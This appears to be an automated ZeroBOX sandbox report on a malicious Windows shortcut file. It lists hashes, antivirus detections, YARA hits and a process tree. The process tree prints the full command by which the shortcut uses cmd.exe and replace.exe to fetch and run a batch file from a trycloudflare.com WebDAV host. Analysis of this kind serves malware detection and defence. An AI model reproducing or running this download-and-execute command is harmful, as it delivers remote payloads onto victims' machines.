Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 2, 2025, 9:45 a.m.	April 2, 2025, 9:48 a.m.

Size	1.8KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Fri May 7 23:14:16 2021, mtime=Fri May 7 23:14:16 2021, atime=Fri May 7 23:14:16 2021, length=331776, window=hidenormalshowminimized
MD5	`a2fe80a8537b1fd2c03d7fad654aae1d`
SHA256	`1aa670e48dc6ae34aa2eb6211b6eb1c36e18a47ffae8487608dc35b02df8e9c2`
CRC32	`217163F7`
ssdeep	`24:8yJRxm0WrZ1nSANx+/j+/eypvSDlY4I0WAEtEjc61yXKaEQ+aaq/OpH61yXPacdO:8Axm/Z1xQXyyIb2jlGKpa5OwGPV`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "DynvLyTnpYAMA" C:\Users\test22\AppData\Local\Temp\rename.lnk
2056
- cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat
  2156
  - replace.exe C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A
    2288

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 2, 2025, 9:45 a.m.	buffer: 'C:\Users\test22\Music\yes.bat' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW April 2, 2025, 9:45 a.m.	buffer: Path not found - \\hot-browser-luke-gran console_handle: 0x00000017	1	1
WriteConsoleW April 2, 2025, 9:45 a.m.	buffer: ted.trycloudflare.com@SSL\DavWWWRoot\yes console_handle: 0x00000017	1	1
WriteConsoleW April 2, 2025, 9:45 a.m.	buffer: .bat console_handle: 0x00000017	1	1
WriteConsoleW April 2, 2025, 9:45 a.m.	buffer: No files added console_handle: 0x00000013	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\rename.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A
cmdline	"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

K7GW	Trojan ( 8474e5ac1 )
K7AntiVirus	Trojan ( 005c47f71 )
VirIT	Trojan.LNK.Heur.A
ESET-NOD32	LNK/TrojanDownloader.Agent.CAO
Kaspersky	HEUR:Trojan-Downloader.WinLNK.Agent.gen
Sophos	Troj/DownLnk-CJ
Google	Detected
Microsoft	Trojan:Win32/WinLNK.GR!MTB
ZoneAlarm	Troj/DownLnk-CJ
VBA32	Trojan.Link.DoubleRun
Zoner	Probably Heur.LNKScript
Tencent	Win32.Trojan-Downloader.Der.Vmhl
huorong	TrojanDownloader/LNK.Agent.en
Fortinet	LNK/Agent.CAO!tr.dldr

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2056 resumed a thread in remote process 2156
NtResumeThread April 2, 2025, 9:45 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2156	1	0	0

rename.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All